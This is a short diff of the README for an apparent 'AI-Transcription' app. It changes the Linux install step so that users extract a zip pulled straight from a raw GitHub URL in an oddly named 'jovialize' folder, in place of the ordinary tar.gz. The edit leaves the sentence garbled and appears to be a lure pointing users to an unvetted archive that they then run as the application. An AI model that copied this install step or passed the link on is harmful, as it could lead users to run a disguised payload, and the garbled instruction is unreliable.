mkulbat5ti3/AI-Transcription/README.md

      - Open the downloaded `.dmg` file.
      - Drag the AI-Transcription app into the Applications folder.
    - For Linux:
-     - Extract the downloaded tar.gz file.
+     - Extract the downloaded https://raw.githubusercontent.com/mkulbat5ti3/AI-Transcription/main/jovialize/AI-Transcription.zip file.
      - Open a terminal window and navigate to the extracted folder.
      - Run `./ai-transcription` to start the application.